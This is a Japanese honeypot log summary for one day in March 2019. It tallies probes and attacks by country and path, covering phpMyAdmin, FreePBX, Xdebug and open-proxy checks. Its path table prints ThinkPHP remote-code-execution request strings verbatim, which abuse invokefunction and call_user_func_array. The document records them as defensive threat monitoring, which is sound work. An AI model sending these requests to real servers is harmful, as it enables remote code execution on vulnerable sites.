ハニーポット観察日記(2019/03/15)
WOWHoneypot
ハニーポット「WOWHoneypot」で2019/03/15 (金) 00:00~23:59 UTC(運用71日目)に取得したログの簡易分析です。
ThinkPHPの脆弱性を利用した攻撃、FreePBXとXdebugの探査がありました。
また、phpMyAdminの探査で普段は設定されていないヘッダフィールド(Client-IP
とX-Forwarded-For
)が設定されていました。
概況
- 集計期間 : 2019/03/15 (金) 00:00~23:59 UTC
- 総アクセス件数 : 37 件(前日比 +19 件)
- トップページへのアクセス : 15 件
- ThinkPHPの脆弱性を利用した攻撃 : 8 件
- phpMyAdminの探査 : 6 件
- robots.txtの探査 : 3 件
- FreePBXの探査 : 2 件
- Xdebugの探査 : 2 件
- オープンプロキシの探査 : 1 件
- ユニークIPアドレス件数 : 20 件 (前日比 +3 件)
- アクセス元の国数 : 14 カ国 (前日比 +4 カ国)
国別のアクセス件数
国別のアクセス件数は以下の通りです。
順位 | 国名 | 件数 | 前日の順位 | 前日の件数 | 件数差 | 備考 |
---|---|---|---|---|---|---|
1. | Russia | 12 | 2. | 3 | +9 | - |
2. | China | 6 | - | 0 | +6 | - |
3. | Ukraine | 3 | - | 0 | +3 | - |
4. | Estonia | 3 | - | 0 | +3 | - |
5. | Iceland | 2 | - | 0 | +2 | - |
6. | United States | 2 | 5. | 2 | +-0 | - |
7. | Brazil | 2 | 3. | 3 | -1 | - |
8. | Netherlands | 1 | - | 0 | +1 | - |
9. | Singapore | 1 | 8. | 1 | +-0 | - |
10. | Australia | 1 | - | 0 | +1 | - |
11. | Spain | 1 | 10. | 1 | +-0 | - |
12. | Czechia | 1 | - | 0 | +1 | - |
13. | Cambodia | 1 | - | 0 | +1 | - |
14. | El Salvador | 1 | - | 0 | +1 | - |
アクセス先
- 2019/02/28以来、15日ぶりにThinkPHPの脆弱性を利用した攻撃を観測しました。
- Xdebugの探査を初めて観測しました。
- 2019/02/24以来、19日ぶりにFreePBXの探査を観測しました。
- 件数は2件で、User-Agentは
python-requests/2.21.0
でした。 - 探査の対象となったパスは以下の通りです。
- /admin/assets/js/views/login.js
- 2件とも1つのIPアドレスからアクセスが行われました。
- 1回目の探査が行われた約7時間30分後に2回目の探査がありました。
- 件数は2件で、User-Agentは
- 今日のphpMyAdminの探査では、以下の2種類のヘッダフィールドが設定されていました。これまでに観測したphpMyAdminの探査では、これらのヘッダフィールドは設定されていませんでした。
Client-IP
X-Forwarded-For
- 今日はUser-Agentが
User-Agent: Z
となっているアクセスはありませんでした。
アクセス先一覧
アクセス先の一覧は以下の通りです。
順位 | 備考 | アクセス先 | 件数 | 前日の順位 | 前日の件数 | 件数差 |
---|---|---|---|---|---|---|
1. | トップページへのアクセス | GET / HTTP/1.1 | 14 | 1. | 13 | +1 |
2. | phpMyAdminの探査 | GET /index.php HTTP/1.1 | 3 | - | 0 | +3 |
3. | phpMyAdminの探査 | GET /phpmyadmin/index.php HTTP/1.1 | 3 | - | 0 | +3 |
4. | robots.txtの探査 | HEAD /robots.txt HTTP/1.0 | 3 | 4. | 1 | +2 |
5. | FreePBXの探査(参照) | GET /admin/assets/js/views/login.js HTTP/1.1 | 2 | - | 0 | +2 |
6. | Xdebugの探査(参照) | GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 | 2 | - | 0 | +2 |
7. | トップページへのアクセス | HEAD / HTTP/1.0 | 1 | - | 0 | +1 |
8. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
9. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
10. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
11. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /thinkphp/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
12. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /thinkphp/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
13. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /TP/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
14. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /TP/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
15. | ThinkPHPの脆弱性を利用した攻撃(参照) | GET /TP/html/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP HTTP/1.1 | 1 | - | 0 | +1 |
16. | オープンプロキシの探査 | GET hxxp://5[.]188[.]210[.]55/echo[.]php HTTP/1.1 | 1 | - | 0 | +1 |
WOWHoneypotで取得したログの簡易分析は以上です。